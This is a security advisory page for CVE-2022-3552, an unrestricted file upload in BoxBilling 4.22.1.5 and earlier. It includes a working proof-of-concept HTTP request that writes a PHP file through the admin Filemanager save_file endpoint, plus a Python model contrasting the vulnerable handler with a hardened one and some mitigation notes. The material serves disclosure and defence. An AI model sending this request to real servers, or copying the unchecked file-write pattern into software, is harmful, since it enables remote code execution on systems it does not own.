BoxBilling 4.22.1.5 Remote Code Execution

๐Ÿ—“๏ธย 28 Mar 2023ย 00:00:00Reported byย zetc0deTypeย 
packetstorm
ย packetstorm
๐Ÿ”—ย packetstormsecurity.com๐Ÿ‘ย 339ย Views

BoxBilling <= 4.22.1.5 (CVE-2022-3552) is vulnerable to unrestricted file upload: an attacker who already holds an authenticated admin session, and whose installation has at least one product order, can write a PHP webshell through the hidden Filemanager save_file API endpoint and obtain remote code execution.

Code
```text
# Exploit Title: BoxBilling<=4.22.1.5 - Remote Code Execution (RCE)
# Date: 2022-09-18
# Exploit Author: zetc0de
# Vendor Homepage: https://www.boxbilling.org/
# Software Link: https://github.com/boxbilling/boxbilling/releases/download/4.22.1.5/BoxBilling.zip
# Version: <=4.22.1.5 (Latest)
# Tested on: Windows 10
# CVE : CVE-2022-3552
# BoxBilling was vulnerable to Unrestricted File Upload.
# In order to exploit the vulnerability, an attacker must have a valid authenticated session as admin on the CMS.
# With at least 1 order of product an attacker can upload malicious file to hidden API endpoint that contain a webshell and get RCE
###################################################################################


## POC
POST /index.php?_url=/api/admin/Filemanager/save_file HTTP/1.1
Host: local.com:8089
Content-Length: 52
Accept: application/json, text/javascript, */*; q=0.01
DNT: 1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=3nrf9i4mv28o5anva77ltq042d
Connection: close

order_id=1&path=ax.php&data=<%3fphp+phpinfo()%3b%3f>

POC Video :
https://drive.google.com/file/d/1m2glCeJ9QXc8epuY2QfvbWwjLTJ8_Hjx/view?usp=sharing
```
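The PoC above shows the whole bug in one request body: `path` and `data` are taken from an admin-only form and written to disk with no check on the file name or extension, so `ax.php` with PHP source in `data` becomes a webshell. The following Python block is an added illustration of that flaw class and its fix; it is not BoxBilling's own PHP code, and the per-order upload directory layout (`<uploads>/<order_id>/`) and the extension allowlist are assumptions. The vulnerable handler reproduces the behaviour the advisory describes; the hardened handler confines the name to the order directory and rejects executable extensions, and it is run against the exact body from the PoC (constructed from the page, not captured from a live target).

```python
"""Model of CVE-2022-3552 (BoxBilling <= 4.22.1.5): a Filemanager
save_file endpoint that writes attacker-controlled `path` and `data`
straight to disk. Added example in Python, not BoxBilling's PHP;
the directory layout and the extension allowlist are assumptions."""
import os
import tempfile
from pathlib import Path
from urllib.parse import parse_qs, quote

# Constructed request body, copied verbatim from the PoC on this page.
POC_BODY = "order_id=1&path=ax.php&data=<%3fphp+phpinfo()%3b%3f>"

# Assumption: only these extensions are legitimate order attachments.
ALLOWED_EXTENSIONS = {".txt", ".pdf", ".png", ".jpg", ".csv"}


def parse_body(body: str) -> dict:
    """Decode a form-urlencoded body into a flat {field: value} dict."""
    fields = parse_qs(body, keep_blank_values=True)
    return {k: v[0] for k, v in fields.items()}


def save_file_vulnerable(uploads: Path, body: str) -> Path:
    """The flawed behaviour: trust `path` and write `data` as-is."""
    p = parse_body(body)
    order_dir = uploads / str(int(p["order_id"]))
    order_dir.mkdir(parents=True, exist_ok=True)
    target = order_dir / p["path"]          # no name or extension check at all
    target.write_text(p["data"])
    return target


def save_file_hardened(uploads: Path, body: str) -> Path:
    """Hardened handler: bare file name only, allowlisted extension,
    and a resolved-path check that the target stays in the order dir."""
    p = parse_body(body)
    order_dir = (uploads / str(int(p["order_id"]))).resolve()
    order_dir.mkdir(parents=True, exist_ok=True)
    name = os.path.basename(p["path"])      # strip any directory component
    if name in ("", ".", "..") or name != p["path"]:
        raise ValueError("path must be a bare file name")
    ext = Path(name).suffix.lower()
    if ext not in ALLOWED_EXTENSIONS:
        raise ValueError(f"extension {ext!r} not allowed")
    target = (order_dir / name).resolve()
    if target.parent != order_dir:          # belt and braces on confinement
        raise ValueError("path escapes order directory")
    target.write_text(p["data"])
    return target


def hardened_check(path: str, data: str = "hello"):
    """Feed an arbitrary `path` to the hardened handler in a scratch
    directory; returns the rejection reason, or None if it was accepted."""
    body = f"order_id=1&path={quote(path, safe='')}&data={quote(data)}"
    with tempfile.TemporaryDirectory() as tmp:
        try:
            save_file_hardened(Path(tmp) / "uploads", body)
        except ValueError as e:
            return str(e)
    return None


def demo():
    """Run both handlers on the PoC body.
    Returns ((written file name, its contents), hardened rejection reason)."""
    with tempfile.TemporaryDirectory() as tmp:
        uploads = Path(tmp) / "uploads"
        written = save_file_vulnerable(uploads, POC_BODY)
        vuln = (written.name, written.read_text())
        try:
            save_file_hardened(uploads, POC_BODY)
            hard = None
        except ValueError as e:
            hard = str(e)
    return vuln, hard


if __name__ == "__main__":
    print(demo())
```

The allowlist is the minimum, not the whole fix: a name such as `shell.php.txt` passes it, so whether that is dangerous depends on how the web server maps handlers to extensions. Storing order attachments outside the document root (and serving them through a download handler) removes that dependency, and the endpoint is still admin-only, so the advisory's precondition of a valid admin session is unchanged by any of this.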


Scores (current as of 28 Mar 2023 00:00)
Vulners risk: 7 (High)
Vulners AI Score: 7
CVSS 3.1: 7.2
CVSS 3: 7.2
EPSS: 0.55788
SSVC:
Views: 339